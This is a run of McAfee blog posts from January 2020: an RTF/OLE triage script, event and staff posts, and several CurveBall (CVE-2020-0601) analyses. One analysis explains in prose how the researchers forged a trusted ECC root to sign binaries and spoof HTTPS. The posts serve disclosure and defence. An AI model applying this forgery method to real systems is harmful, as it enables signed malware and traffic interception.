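    # interleave control words with the hex to break naive extractors.
    inner = re.sub(r"\\\*|\\[A-Za-z]+-?\d* ?", "", inner)
    hexstr = "".join(c for c in inner if c in "0123456789abcdefABCDEF")
    if len(hexstr) % 2:
        hexstr = hexstr[:-1]   # tolerate a truncated trailing nibble
    return bytes.fromhex(hexstr)


def triage_rtf(text: str) -> List[Dict[str, object]]:
    """Return one finding per embedded object, with triage flags."""
    findings = []
    for m in re.finditer(r"\{\\object\b", text):
        group = rtf_group_at(text, m.start())
        kind = re.search(r"\\(" + "|".join(EMBED_TYPES) + r")\b", group)
        cls = re.search(r"\{\\\*\\objclass\s*([^}]*)\}", group)
        progid = cls.group(1).strip() if cls else ""
        blob = objdata_bytes(group)
        ole2_at = blob.find(OLE2_MAGIC)
        flags = []
        if progid.lower() == "package":
            flags.append("ole-package")         # any file type, runs on click
        if kind and kind.group(1) == "objocx":
            flags.append("ole-control")         # COM control loaded on render
        if ole2_at >= 0:
            flags.append("ole2-compound-file")  # carve from here and walk streams
        findings.append({
            "embed_type": kind.group(1) if kind else "",
            "progid": progid,
            "objdata_size": len(blob),
            "ole2_offset": ole2_at,
            "flags": flags,
        })
    return findings


if __name__ == "__main__":
    for finding in triage_rtf(SAMPLE_RTF):
        print(finding)
```

The carved offset is where an OLE2 parser would start walking the compound file’s directory and streams for the next stage of analysis.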

McAfee Response

As Microsoft Office vulnerabilities continue to surface, generic inspection methods will have to be improved and enhanced, consequently leading to better detection results. As a reminder, the McAfee Anti-Malware engine used on all our endpoints and most of our appliances has the potential to unpack Office, RTF and OLE documents, expose the streams of content and unpack these streams if necessary.

RSA 2020 – See You There! https://www.mcafee.com/blogs/enterprise/rsa-2020-see-you-there/ https://www.mcafee.com/blogs/enterprise/rsa-2020-see-you-there/#respond Thu, 23 Jan 2020 21:40:44 +0000 /blogs/?p=98240


It’s that time of year again—security companies are starting to gear up for the RSA Conference in San Francisco’s Moscone Center. Known as one of the world’s largest security conferences, RSA attracts around 42,000 attendees, including 700 speakers, and hosts more than 550 sessions. This year, RSA organizers are adding a new element for attendees to enjoy called the “Engagement Zone,” a networking space designed to inspire attendees with an interactive, collaborative and cooperative learning space.

This year’s RSA Conference theme is the “Human Element.” With new technologies, strategies and AI being employed by both security pros and threat actors, one thing remains constant: us. We are the Human Element within cybersecurity. Here at McAfee, we couldn’t agree more. McAfee’s Senior Principal Engineer and Chief Data Scientist, Celeste Fralick, said, “While the possibilities with AI seem endless, the idea that they could eliminate the role of humans in cybersecurity departments is about as farfetched as the idea of a phalanx of Baymaxes replacing the country’s doctors.” According to Celeste, AI and humans have equally important roles in cybersecurity. “There are tasks that humans currently excel at that AI could potentially perform someday. But these tasks are ones that humans will always have a sizable edge in, or are things AI shouldn’t be trusted with.”

Whether you’re a seasoned veteran or a first-time attendee at RSA, you should sketch out a game plan of the sessions and booths you want to visit before making your way into the city.

Join McAfee at RSA 2020

CSA Summit Keynote: Case Study: Obvious and Not-So Obvious Lessons Learned On the Path to Cloud-First IT

Monday, February 24 | 1:00pm – 1:20pm | Moscone Center

Land O’ Lakes operates a global dairy and agriculture co-operative across 60 countries with thousands of distributed employees. The demands of global business once required highly complex applications running in their private data centers, but are now met with increased velocity and better security in the public cloud. How did they do it? Hear from Land O’ Lakes CISO Tony Taylor and McAfee SVP of Cloud Security Rajiv Gupta as they share lessons learned along the journey to cloud-first IT at Land O’ Lakes, including new requirements for cloud-native security controls and the evolution to a cloud-edge architecture that has replaced their former network.

Keynote: Time to Tell

Tuesday, February 25 | 8:35am – 8:55am | RSA West Stage | Session Code: KEY-T03W

Cyber defenses from a generation ago linger front and center, even as quantum computing will reshape the digital world. Steve Grobman makes the case it’s time to move beyond intelligence.

Session: Inside the Takedown of the Rubella Macro Builder Suspect

Tuesday, February 25 | 1:00pm – 1:50pm | Moscone South | Session Code: PART1-T10

During this session, the McAfee Advanced Threat Research lead investigator will explain some of the details the team found that helped unmask the suspected actor behind the Rubella Macro Builder. These details were shared with law enforcement and proved to be crucial in its investigation.

Session: Emerging Threats: Deep Fakes are Getting Terrifyingly Real – How Can We Spot Them?

Monday, February 24 | 3:05pm – 3:35pm | Moscone West | Session Code: SEM-M03

This seminar will provide a full day of focus on emerging threats such as ransomware, targeted attacks, emerging IoT threats, and new aspects of social engineering and deep fake human manipulation. Sessions get inside the minds and motivations.

Session: Reproducibility: The Life and Risks of a Model

Tuesday, February 25 | 2:20pm – 3:10pm | Moscone West, Classroom: MLAI1-R09 | Session Code: MLAI1-R09

Analytics are becoming ubiquitous in the ever-increasing world of data. Often, those analytics are implemented without thorough consideration of the life and the risks of the model employed. This session will explore enabling reproducibility and repeatability in data science, the life cycle of a model, what is missing in typical models of today, and how to ensure the healthy and reliable life of a model.

See You Soon!

There’s a lot to look forward to at RSA 2020, so be sure to stop by booth #N-5745 in the North Hall for demos, theater sessions, and more. Feel free to use code XS0UMCAFE for a free RSAC expo pass. Also, be sure to follow @McAfee for real-time updates from the show throughout the week.

You Bring the Yoga Mat, McAfee Brings the Goats https://www.mcafee.com/blogs/other-blogs/life-at-mcafee/you-bring-the-yoga-mat-mcafee-brings-the-goats/ https://www.mcafee.com/blogs/other-blogs/life-at-mcafee/you-bring-the-yoga-mat-mcafee-brings-the-goats/#respond Thu, 23 Jan 2020 17:09:29 +0000 /blogs/?p=98219

Yogis are likely familiar with the term vinyasa, but have you heard of caprine vinyasa? Caprine vinyasa elevates your standard yoga practice to a whole new level – with goats!

At McAfee, we recognize how beneficial stepping away from our desk can be for both our bodies and minds. Taking time to recharge, reset, and care for our physical and mental health is critical to live our best lives at and away from the office.

To offer our team members a smile-inducing wellness opportunity to practice mindfulness, we brought goats to the office for a yoga session. Why goats? Because animal therapy is known to lower blood pressure, lower anxiety, and increase mental stimulation (this is also why you can bring your dog to the office on Fridays!).

During our goat yoga day, goats climbed on people, nuzzled up next to others, and played with each other across the yoga mats. It was nearly impossible to take anything too seriously or to leave without a smile.

“I never imagined I’d be doing yoga with my teammates, let alone with goats climbing on my back! For me, it says a lot about a company that cares enough about employees to offer time away from your desk to practice mindfulness in a unique way. I can’t say I’ll join the regular goat yogis, but it was a great experience with my team!” – Jenna, People Analytics

Ready to join a company that cares about your wellbeing (and loves furry friends!)? Search our openings.

Dangerous Digital Rituals: Could Your Child be Sleep Deprived? https://www.mcafee.com/blogs/consumer/family-safety/dangerous-digital-rituals-is-your-child-sleep-deprived/ https://www.mcafee.com/blogs/consumer/family-safety/dangerous-digital-rituals-is-your-child-sleep-deprived/#respond Sat, 18 Jan 2020 18:00:39 +0000 /blogs/?p=98196

You’re not wrong if you suspect your kids are spending far more time online than they admit. Where you may be in the dark, however, is that a lot of kids (maybe even yours) are scrolling at night instead of sleeping, a digital ritual that puts their physical and mental health at risk.

And, because sleep and behavior are so intertwined, one family member’s unwise tech habits can quickly spill over and affect the whole family.

Screens over ZZZs

That moody stew your daughter has been dishing up all day may or may not be standard teen angst. And the D in math your son brought home for the first time may have little to do with geometric proofs.

While it may not be the first thing that comes to a parent’s mind, sleep deprivation could be a source of a number of family challenges today.

According to a 2019 Common Sense Media study, 68 percent of teens take their devices to their rooms at bedtime, and one-third have the phone with them in bed. Over one-third of those kids, and more than one-fourth of parents, admit to waking up to look at their phone at least once a night (usually to check social media or respond to a notification).

What science says

Like water and air, humans need sleep to live. Sleep deprivation over time is a serious condition, especially for children. Medical studies continue to link poor sleep habits to anxiety, reduced cognitive development, obesity, immunity issues, absentmindedness, and impaired judgment. Because depriving the brain of sleep reduces its reaction time, it’s also one of the main causes of road accidents.

How much sleep do they need? The American Academy of Pediatrics recommendations:

  • Children 3-5 should sleep 10 to 13 hours on a regular basis
  • Children 6-12 should sleep 9 to 12 hours on a regular basis
  • Children 13-18 should sleep 8 to 10 hours on a regular basis

Goal: digital responsibility

I recently met a mom in a parenting forum who tackled this very issue by establishing clear ground rules for nighttime device use.

Dana Ahern is the mom of four (ages 7-15) and co-founder (along with husband Adam) of Village Social, a private, safe, “alternative” social network that helps teach kids digital responsibility.

Ahern says establishing ground rules for devices only works if parents stick to them.

“Yes, they [kids] might get mad,” says Ahern. “Yes, they may say they need their phone to listen to music or a meditation app to be able to fall asleep or need the alarm to wake up in the morning. Our solution — get them an Echo Dot or an old fashioned alarm clock radio in place of the phone.”

In the Ahern home, all screens must be shut off at least one hour before bedtime and put on a docking station in the parents’ bedroom. Screen time is tracked via Apple’s Downtime app. And, all homework must be done in the living room (no bedrooms) with an absolute cut-off time of 10 p.m.

Says Ahern, “We’ve found that it’s been relatively easy to get all the kids on this schedule. They don’t fight it. They may, in fact, secretly appreciate knowing we care.”

More ideas to consider:

It’s never “too late” for a good change. Some parents say they’re reluctant to give their kids (especially teens) new technology rules because it’s “too late,” and their kids are too attached to their devices. Even so, with more information linking technology to kids’ mental health, it’s imperative to change course if needed — even if doing so may be difficult.

Reframe the change. Why are kids on their phones all night? Because they want to be and want often overpowers need in this age group. To help kids make tough digital shifts, discuss the personal gains that will result from the change. For instance, consistent quality sleep can help control weight, boost academic and athletic performance, increase energy and immunity levels, reduce drama and conflict, sharpen decision-making, and improve creativity and motivation. In short, quality sleep ignites our superpowers.

Add monitoring muscle. There are a number of ways to help keep a child’s screen time on track. One is a monitoring solution. Need to make sure your youngest is only accessing the internet for homework at night? Or limit online game time to 30 minutes a day? Software support could help.

Model good sleep habits. Your kids will be the first ones to call you out if your screen time goes up while they are digitally wasting away. In the same study cited above, 39 percent of teens said their parents spent too much time on their phones in 2019 (an 11-point jump from 2016).

Any change to your child’s favorite rituals may put a temporary strain on the family dynamic. That’s okay. A little healthy tension, some grumbling, and lingering awkwardness are all side effects of successful digital parenting. Also, remind yourself and your kids as often as you need to that restricting device use — especially at bedtime — isn’t a punishment. It’s a health and safety choice that isn’t negotiable. Translation? Limits equal love.

CurveBall – An Unimaginative Pun but a Devastating Bug https://www.mcafee.com/blogs/other-blogs/mcafee-labs/curveball-an-unimaginative-pun-but-a-devastating-bug/ https://www.mcafee.com/blogs/other-blogs/mcafee-labs/curveball-an-unimaginative-pun-but-a-devastating-bug/#respond Sat, 18 Jan 2020 05:49:30 +0000 /blogs/?p=98203

Enterprise customers looking for information on defending against Curveball can find information here.

2020 came in with a bang this year, and it wasn’t from the record-setting number of fireworks on display around the world to celebrate the new year. Instead, just over two weeks into the decade, the security world was rocked by a fix for CVE-2020-0601 introduced in Microsoft’s first Patch Tuesday of the year. The bug was submitted by the National Security Administration (NSA) to Microsoft, and though initially deemed only “important”, it didn’t take long for everyone to figure out that this bug fundamentally undermines the entire concept of trust that we rely on to secure web sites and validate files.

The vulnerability concerns ECC (Elliptic Curve Cryptography), which is a very common method of digitally signing certificates, including both those embedded in files and those used to secure web pages. It represents a mathematical combination of values that produce a public and private key for trusted exchange of information. Ignoring the intimate details for now, ECC allows us to validate that files we open or web pages we visit have been signed by a well-known and trusted authority. If that trust is broken, malicious actors can “fake” signed files and web sites and make them look to the average person as if they were still trusted or legitimately signed.

The flaw lies in the Microsoft library crypt32.dll, which has two vulnerable functions. The bug is straightforward in that these functions only validate the public key value, and NOT the parameters of the ECC curve itself. What this means is that if an attacker can find the right mathematical combination of private key and the corresponding curve, they can generate the identical public key value as the trusted certificate authority, whomever that is. And since this is the only value checked by the vulnerable functions, the “malicious” or invalid parameters will be ignored, and the certificate will pass the trust check.

As soon as we caught wind of the flaw, McAfee’s Advanced Threat Research team set out to create a working proof-of-concept (PoC) that would allow us to trigger the bug, and ultimately create protections across a wide range of our products to secure our customers. We were able to accomplish this in a matter of hours, and within a day or two there were the first signs of public PoCs as the vulnerability became better understood and researchers discovered the relative ease of exploitation.

Let’s pause for a moment to celebrate the fact that (conspiracy theories aside) government and private sector came together to report, patch and publicly disclose a vulnerability before it was exploited in the wild. We also want to call out Microsoft’s Active Protections Program, which provided some basic details on the vulnerability allowing cyber security practitioners to get a bit of a head start on analysis.

The following provides some basic technical detail and a timeline of the work we did to analyze, reverse engineer and develop working exploits for the bug. This blog focuses primarily on the research efforts behind file signing certificates. For a more in-depth analysis of the web vector, please see this post.

Creating the proof-of-concept

The starting point for simulating an attack was to have a clear understanding of where the problem was. An attacker could forge an ECC root certificate with the same public key as a Microsoft ECC Root CA, such as the ECC Product Root Certificate Authority 2018, but with different “parameters”, and it would still be recognized as a trusted Microsoft CA. The API would use the public key to identify the certificate but fail to verify that the parameters provided matched the ones that should go with the trusted public key.

There have been many instances of cryptography attacks that leveraged failure of an API to validate parameters (such as these two) and attackers exploiting this type of vulnerability. Hearing about invalid parameters should raise a red flag immediately.

To minimize effort, an important initial step is to find the right level of abstraction and the details we need to care about. The minimal details available on the bug refer to the public key and curve parameters and say nothing about specific signature details, so reading about how to generate a public/private key pair in Elliptic Curve (EC) cryptography and how to define a curve should be enough.

The first part of this Wikipedia article defines most of what we need to know. There’s a point G that’s on the curve and is used to generate another point. To create a pair of public/private keys, we take a random number k (the private key) and multiply it by G to get the public key (Q). So, we have Q = k*G. How this works doesn’t really matter for this purpose, so long as the scalar multiplication behaves as we’d expect. The idea here is that knowing Q and G, it’s hard to recover k, but knowing k and G, it’s very easy to compute Q.

Rephrasing this in the perspective of the bug, we want to find a new k’ (a new private key) with different parameters (a new curve, or maybe a new G) so that the ECC math gives the same Q back. The easiest solution is to consider a new generator G’ that is equal to our target public key (G’= Q). This way, with k’=1 (a private key equal to 1) we get k’G’ = Q which would satisfy the constraints (finding a new private key and keeping the same public key).

The next step is to verify if we can actually specify a custom G’ while specifying the curve we want to use. Microsoft’s documentation is not especially clear about these details, but OpenSSL, one of the most common cryptography libraries, has a page describing how to generate EC key pairs and certificates. The following command shows the standard parameters of the P384 curve, the one used by the Microsoft ECC Root CA.

Elliptic Curve Parameter Values

We can see that one of the parameters is the Generator, so it seems possible to modify it.

Now we need to create a new key pair with explicit parameters (so all the parameters are contained in the key file, rather than just embedding the standard name of the curve) and modify them following our hypothesis. We replace the Generator G’ by the Q from Microsoft Certificate, we replace the private key k’ by 1 and lastly, we replace the public key Q’ of the certificate we just generated by the Q of the Microsoft certificate.

To make sure our modification is functional, and the modified key is a valid one, we use OpenSSL to sign a text file and successfully verify its signature.

Signing a text file and verifying the signature using the modified key pair (k’=1, G’=Q, Q’=Q)

From there, we followed a couple of tutorials to create a signing certificate using OpenSSL and signed custom binaries with signtool. Eventually we’re greeted with a signed executable that appeared to be signed with a valid certificate!

Spoofed/Forged Certificate Seemingly Signed by Microsoft ECC Root CA

Using Sysinternals’ SigChecker64.exe along with Rohitab’s API Monitor (which, ironically, is on a site not using HTTPS) on an unpatched system with our PoC, we can clearly see the vulnerability in action in the return values of these functions.

Rohitab API Monitor – API Calls for Certificate Verification

Industry-wide vulnerabilities seem to be gaining critical mass and increasing visibility even to non-technical users. And, for once, the “cute” name for the vulnerability showed up relatively late in the process. Visibility is critical to progress, and an understanding and healthy respect for the potential impact are key factors in whether businesses and individuals quickly apply patches and dramatically reduce the threat vector. This is even more essential with a bug that is so easy to exploit, and likely to have an immediate exploitation impact in the wild.

McAfee Response

McAfee aggressively developed updates across its entire product line. Specific details can be found here.

What CVE-2020-0601 Teaches Us About Microsoft’s TLS Certificate Verification Process https://www.mcafee.com/blogs/other-blogs/mcafee-labs/what-cve-2020-0601-teaches-us-about-microsofts-tls-certificate-verification-process/ https://www.mcafee.com/blogs/other-blogs/mcafee-labs/what-cve-2020-0601-teaches-us-about-microsofts-tls-certificate-verification-process/#respond Fri, 17 Jan 2020 21:25:55 +0000 /blogs/?p=98190

By: Jan Schnellbächer and Martin Stecher, McAfee Germany GmbH

This week security researchers around the world were very busy working on Microsoft’s major crypto-spoofing vulnerability (CVE-2020-0601), otherwise known as Curveball. The majority of research went into attacks with malicious binaries signed with a spoofed Certificate Authority (CA) which unpatched Windows 10 systems would in turn trust. The other attack vector — HTTPS server certificates — got less attention until Saleem Rashid posted a first working PoC on Twitter, followed by Kudelski Security and “Ollypwn”, who published more details on how the proofs of concept are created.

McAfee security experts followed the same approach and were able to reproduce the attack. In addition, they confirmed that users browsing via unpatched Windows systems were protected provided their clients were deployed behind McAfee’s Web Gateway or Web Gateway Cloud Service and running the certificate verification policy. This is typically part of the SSL Scanner but is also available as a separate policy even if no SSL inspection is to be done (see KB92322 for details).

In our first attempt, we used the spoofed version of a CA from the Windows Root CA trust store to sign a server certificate and then provided only the server certificate when the HTTPS connection was being established. That attempt failed and we assumed that we had not got the spoofing right. Then we learned that the spoofed CA actually needs to be included together with the server certificate, and that chain of certificates is then accepted by an unpatched Windows 10 system.

But why is that? By sending the spoofed version, it becomes obvious that this is not the same certificate that exists in the trust store and should be denied immediately. Also, in the beginning, we tried hard to make the spoofed CA as similar to the original CA as possible (same common name, same serial number, etc.). In fact, we found that none of that plays any role when Windows does the certificate verification.

A good indication of what’s happening behind the scenes is already provided by Windows’ own certificate information dialogs. We started with the “UserTrust ECC Certificate” in the Windows Trusted Root CA catalog which carries the friendly name “Sectigo ECC”. Then we created a spoofed version of that CA and gave it a new common name “EVIL CA”. With that, it was easy to set up a new test HTTPS server in our test network and manipulate the routing of a test client so that it would reach our server when the user types https://www.google.com into the browser. The test server was presenting SSL session information for debugging purposes instead of any Google content.

When you click on the lock symbol, the browser tells you that the connection has been accepted as valid and trusted and that the original “Sectigo ECC” root CA had signed the server certificate.

But we know that this was not the case, and, in contrast to our own original assumptions, Windows did not even verify the server certificate against “Sectigo ECC”. It compared it against the included spoofed CA. That can be seen when you click through to “View certificates”:

As the screenshot shows, we are still in the same SSL session (the master key is the same on both pictures), but now Windows is showing that the (correct) issuer of the server certificate is our spoofed “EVIL CA”.

Windows’ cryptographic signature verification works correctly

The good news is that Windows does not really have an issue with the cryptographic functions to validate the signature of an elliptic curve certificate! That verification works correctly. The problem is how the trust chain comparison is done to prove that the chain of signatures is correctly ending in the catalog of trusted root CAs.

We assumed that an attack would use a signing CA that points to an entry in the trusted Root CA store and verification of the signature would be limited so that the signature would be accepted although it was not signed with that original CA but a spoofed CA. But in fact, Windows is validating the embedded certificate chain — which is perfectly valid and cryptographically correct— and then matches the signing certificate with the entries in the trusted Root CA store. This last piece is what has not been done correctly (prior to the system patch).

Our tests revealed that Windows does not even try to match the certificates. It only matches the public key of the certificates (and a few more comparisons and checks) – making the comparison incomplete. That was the actual bug of this vulnerability (at least as web site certificates are concerned).

The Trusted Certificate Store is actually a Trusted Public Key Store

When we talk about the trust chain in SSL/TLS communication, we mean a chain of certificates that are signed by a CA until we reach a trusted Root CA. But Microsoft appears to ignore the certificates for the most part and manages a chain of the public keys of certificates. The comparison also covers the algorithm. At a time when only RSA certificates were used, that was sufficient: it was not possible for an attacker to create his own key pair with the same public key as the trusted certificate. With the introduction of Elliptic Curve Cryptography (ECC), Microsoft’s comparison of only the algorithm and the public key is failing, because it does not also compare the characteristics of the elliptic curve itself. Without this additional parameter, an attacker simply creates the same public key (curve point) again on a different curve. This is what was fixed on Patch Tuesday — the comparison of the public key information now includes the curve characteristics.

This screenshot shows that the original certificate on the right and the spoofed CA on the left are very different: a different common name and a totally different elliptic curve (a standard curve for the original CA, a handcrafted one for the spoofed version), yet the value shown under the “pub” entry is identical. That was sufficient to make Windows believe the embedded spoofed CA was the same as the trusted CA in the certificate store.

Why not compare certificates by name or serial number?

A different (and perhaps more natural) algorithm is to compare certificates by their common name and/or serial number and, whenever there is a match, continue the trust chain verification with the certificate from the trust store. Why is Windows comparing public keys instead? We can only speculate, but the advantage might be for enterprises that want to swap their certificates without rolling out new root CAs to all client computers. Imagine an organization that maintains its own PKI and installs its own Root CA in the store of trusted certificates. When such a company goes through a merger or acquisition, the company name may change, which would be a good time to also change the common name of the signing certificate. However, if you do not have a good way to remotely maintain all clients and update the certificate in the trusted store, it is easier to tell the corporation to reuse the original key pair and create a new certificate with that same key pair. The new cert will still match the old cert and no client update is necessary. Convenient! But is it secure? At this point it is not really a chain of trusted certificates but a chain of trusted public keys.

We tested whether this could also be misused to create a new cert when the old one has expired, but that is not the case. After comparing the public keys, Windows still uses the expiration date of the certificate in the trusted store to determine whether the chain is valid, which is good.

How to harden the process?

The root problem of this approach is that the complete cryptographic verification happens with the embedded certificates, and only after that verification is the match against the entry in the trusted Root CA store done. That always leaves room for oversights and incomplete matching algorithms, as we have seen with this vulnerability. A safer approach is to first match the certificates (or public keys), find the corresponding entry in the Trusted Root CA store, and then use that trusted certificate to continue the signature verification. That way, the verification fails on the safe side and broken chains can be identified easily.
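The public-key matching described under “The Trusted Certificate Store is actually a Trusted Public Key Store” and the anchor-first order of operations proposed just above, as an added Python example that is not part of the McAfee post or of Microsoft’s implementation. It hand-builds SubjectPublicKeyInfo (SPKI) DER structures (the point and the explicit-parameter blob are constructed placeholders, not real curve data) and contrasts a match on algorithm plus key point with one that also covers the curve parameters, followed by a trust-anchor lookup that happens before any signature verification.

```python
"""Added example, not from the McAfee post or Microsoft's code: models the
root-CA key matching behind CVE-2020-0601 with hand-built SubjectPublicKeyInfo
(SPKI) DER, using no real keys or certificates."""
from dataclasses import dataclass
from typing import Optional

# Real OIDs: id-ecPublicKey and the named curve prime256v1 (P-256).
OID_EC_PUBLIC_KEY = "1.2.840.10045.2.1"
OID_PRIME256V1 = "1.2.840.10045.3.1.7"


def _der_len(n: int) -> bytes:
    """DER length octets, short or long form."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def _tlv(tag: int, body: bytes) -> bytes:
    return bytes([tag]) + _der_len(len(body)) + body


def _base128(n: int) -> bytes:
    out = [n & 0x7F]
    n >>= 7
    while n:
        out.append(0x80 | (n & 0x7F))
        n >>= 7
    return bytes(reversed(out))


def der_oid(dotted: str) -> bytes:
    """Encode a dotted OID as a DER OBJECT IDENTIFIER."""
    arcs = [int(a) for a in dotted.split(".")]
    body = _base128(40 * arcs[0] + arcs[1])
    for arc in arcs[2:]:
        body += _base128(arc)
    return _tlv(0x06, body)


def build_spki(params_der: bytes, point: bytes) -> bytes:
    """SPKI ::= SEQUENCE { SEQUENCE { id-ecPublicKey, params }, BIT STRING }."""
    alg = _tlv(0x30, der_oid(OID_EC_PUBLIC_KEY) + params_der)
    return _tlv(0x30, alg + _tlv(0x03, b"\x00" + point))


def _read_tlv(buf: bytes, pos: int):
    """Return (tag, body, next_pos) for the TLV that starts at pos."""
    tag, first = buf[pos], buf[pos + 1]
    pos += 2
    if first & 0x80:
        n = first & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    else:
        length = first
    return tag, buf[pos:pos + length], pos + length


def parse_spki(der: bytes):
    """Split an SPKI into (algorithm OID DER, raw parameters DER, point)."""
    _, body, _ = _read_tlv(der, 0)
    _, alg_body, pos = _read_tlv(body, 0)
    _, bit_string, _ = _read_tlv(body, pos)
    _, oid_body, p = _read_tlv(alg_body, 0)
    return _tlv(0x06, oid_body), alg_body[p:], bit_string[1:]


def weak_key_match(trusted_spki: bytes, presented_spki: bytes) -> bool:
    """Pre-patch style: same algorithm OID and same public key point only.
    The curve parameters are never consulted, so a key on a handcrafted
    curve that reproduces the trusted point is accepted."""
    t_oid, _, t_point = parse_spki(trusted_spki)
    p_oid, _, p_point = parse_spki(presented_spki)
    return t_oid == p_oid and t_point == p_point


def strict_key_match(trusted_spki: bytes, presented_spki: bytes) -> bool:
    """Compare the complete SubjectPublicKeyInfo, curve parameters included."""
    return parse_spki(trusted_spki) == parse_spki(presented_spki)


@dataclass(frozen=True)
class TrustAnchor:
    name: str
    spki: bytes


def find_trust_anchor(store, presented_spki: bytes) -> Optional[TrustAnchor]:
    """Hardened order of operations: locate the trusted entry first, so the
    caller continues verification with the anchor's own key rather than the
    embedded one. Returns None when no entry matches strictly."""
    for anchor in store:
        if strict_key_match(anchor.spki, presented_spki):
            return anchor
    return None


# Constructed sample data: a placeholder point, not on any real curve, and a
# stand-in for an explicit ECParameters blob (version 1 plus a dummy field).
SAMPLE_POINT = b"\x04" + bytes(range(64))
SPOOFED_PARAMS = _tlv(0x30, _tlv(0x02, b"\x01") + _tlv(0x04, b"\xAA" * 4))
TRUSTED_ROOT_SPKI = build_spki(der_oid(OID_PRIME256V1), SAMPLE_POINT)
SPOOFED_CA_SPKI = build_spki(SPOOFED_PARAMS, SAMPLE_POINT)
TRUSTED_STORE = [TrustAnchor("Constructed Trusted Root", TRUSTED_ROOT_SPKI)]

if __name__ == "__main__":
    print("weak match accepts spoofed CA:", weak_key_match(TRUSTED_ROOT_SPKI, SPOOFED_CA_SPKI))
    print("strict match accepts spoofed CA:", strict_key_match(TRUSTED_ROOT_SPKI, SPOOFED_CA_SPKI))
    print("anchor found for spoofed CA:", find_trust_anchor(TRUSTED_STORE, SPOOFED_CA_SPKI))
```

The weak check accepts the constructed spoofed SPKI because only the point is compared; the strict check and the anchor lookup reject it because the parameters field differs.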

We do not know whether that has been changed with the patched Windows version or if only the matching algorithm has been improved. If not, we recommend reviewing this alternative approach and further hardening the implementation in the operating system and browser.

McAfee’s Defenses Against Microsoft’s CryptoAPI Vulnerability
https://www.mcafee.com/blogs/enterprise/endpoint-security/mcafees-defenses-against-microsofts-cryptoapi-vulnerability/ (Fri, 17 Jan 2020 14:35:18 +0000)


Microsoft made news this week with the widely reported vulnerability known as CVE-2020-0601, which impacts the Windows CryptoAPI. This highly critical vulnerability allows an attacker to fake both signatures and digital certificates. The attacker would use spoofed Elliptic-curve cryptography (ECC) certificates for signing malicious files to evade detection or target specific hostnames to evade browser security alerts by making it appear the file was from a trusted, legitimate source. The user would have no way of knowing the file was malicious, because the digital signature would appear to be from a trusted provider. A successful exploit could also allow the attacker to conduct man-in-the-middle attacks and decrypt confidential information on user connections to the affected software.

The CVE-2020-0601 vulnerability reportedly impacts Windows 10, Windows Server 2019, and Windows Server 2016. The Microsoft patch (linked below) addresses the vulnerability by ensuring that Windows CryptoAPI completely validates ECC certificates.

Since it was identified, a public exploit PoC has been posted that allows any malicious party to use this exploit to sign executables as a third party. The bug can also be used to intercept and fake secure web (HTTPS) connections and to fake signatures for files and emails.

Details on McAfee’s enterprise defenses against this vulnerability are outlined below and available in knowledge base article KB92322. Additional products may be updated with extra countermeasures and defenses as our research uncovers more. We will continue to update the articles.

What can you do to protect yourself?

The bug is considered to be highly critical. It is important for everyone running a vulnerable operating system to apply the security update provided by Microsoft.

Large organizations that follow 15/30/60-day patch cycles should consider making an exception and applying the patches as soon as possible.

Microsoft’s security patches are available here. The event is serious enough that the NSA has released its own security advisory, with mitigation information and guidance on how to detect exploitation, urging IT staff to expedite the installation of Microsoft’s security updates. The Cybersecurity and Infrastructure Security Agency (CISA) at the Department of Homeland Security (DHS) has also released an emergency directive to alert the US private sector and government entities about the need to install the latest Windows OS fixes sooner rather than later.

How are McAfee Customers Protected?

McAfee products can help detect and prevent the exploit from executing on your systems. Specifically:

McAfee Endpoint Security (ENS)

McAfee can help protect against this vulnerability with a signature set to help detect fraudulently signed files.

Threat Intelligence Exchange (TIE)

TIE can help identify file signing abuse prior to patching by providing a workflow to pivot into spoofed CAs and the binaries they signed that have already run in the environment.

McAfee Network Security Platform (IPS)

NSP signatures (Emergency Signature set version 10.8.3.3) will prevent file signing abuse by blocking connections that are using certificates known to be impacted by the vulnerability.

McAfee Web Gateway

File signature inspection has been implemented in Web Gateway Anti-Malware. Using HTTPS scanning on the Web Gateway moves the certificate validity checks from the endpoints to the gateway and provides a central HTTPS certificate policy that does not depend on the vulnerable function.

McAfee MVISION EDR

MVISION EDR can detect exploit attempts for this vulnerability on patched systems. In order to identify devices that have been involved recently in an exploit attempt, the customer can use the Real Time Search dashboard to execute a query using an NSACryptEvents collector.

McAfee Active Response (MAR)

McAfee Active Response has the ability to detect exploit attempts for this vulnerability. To identify devices that have been involved recently in an exploit attempt, the customer can use Active Response Catalog to create a custom collector and Active Response Search to execute a query using that collector. McAfee Active Response (MAR) users can also do a real time query with the NSACryptEvents collector.

McAfee Enterprise Security Manager (SIEM)

McAfee Enterprise Security Manager can detect exploit attempts for this vulnerability on patched systems by matching events routed to the SIEM against new signatures available via the normal content update process. (Refer to the knowledge-base article outlining how to update ESM rules.)

New rules have been uploaded to the content server with new signature IDs and descriptions for these events. Customers can use these to create alarms.

Full details on how to access these solutions are outlined in knowledge-base article KB92322. Additional products may be updated with additional countermeasures and defenses as our research uncovers more. We will continue to update knowledge-base article KB92322 with any additional recommendations or findings.

What Is the CurveBall Bug? Here’s What You Need to Know
https://www.mcafee.com/blogs/consumer/what-is-the-curveball-bug/ (Fri, 17 Jan 2020 02:59:12 +0000)


Today, it was announced that researchers published proof of concept code (essentially, an exercise to determine if an idea is a reality) that exploits a recently patched vulnerability in the Microsoft Windows operating system (OS). The vulnerability, named CurveBall, impacts the components that handle the encryption and decryption mechanisms in the Windows OS, which inherently help protect sensitive information.

How It Works

So how does this vulnerability work, exactly? For starters, unsafe sites or files can disguise themselves as legitimate ones. When this vulnerability is exploited, CurveBall could allow a hacker to launch man-in-the-middle attacks, in which a hacker secretly relays and possibly alters the communications between two unsuspecting users. Additionally, a hacker could use the vulnerability to intercept and fake secure web (HTTPS) connections or fake signatures for files and emails. Essentially, this means a hacker could place harmful files or run undetected malware on a system.

What It Impacts

There are still questions surrounding what exactly is impacted by CurveBall, and subsequently what could be affected by the new code. According to Microsoft, CurveBall impacts Windows 10, Windows Server 2019, and Windows Server 2016 OS versions. With three popular operating systems afflicted, and the possibility to bypass basic security safeguards, patching is more important than ever. For unpatched systems, malware that takes advantage of this vulnerability may go undetected and slip past security features.

How to Stay Protected

Now, what should you do to protect yourself from the CurveBall vulnerability? At McAfee, we are in the process of deploying an update to keep our loyal users secure from this vulnerability. In the meantime, however, there are a few things you should do to protect yourself. Start by following these tips:

  • Update your Windows 10 OS to get the latest security patches.
